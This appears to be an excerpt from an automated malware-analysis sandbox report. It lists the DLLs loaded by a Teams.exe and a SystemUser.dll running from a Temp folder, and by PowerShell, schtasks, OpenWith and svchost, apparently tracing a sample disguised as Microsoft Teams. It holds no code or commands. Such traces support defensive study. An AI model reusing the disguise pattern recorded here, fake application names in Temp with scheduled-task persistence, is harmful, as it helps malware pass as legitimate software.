                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: rsaenh.dll
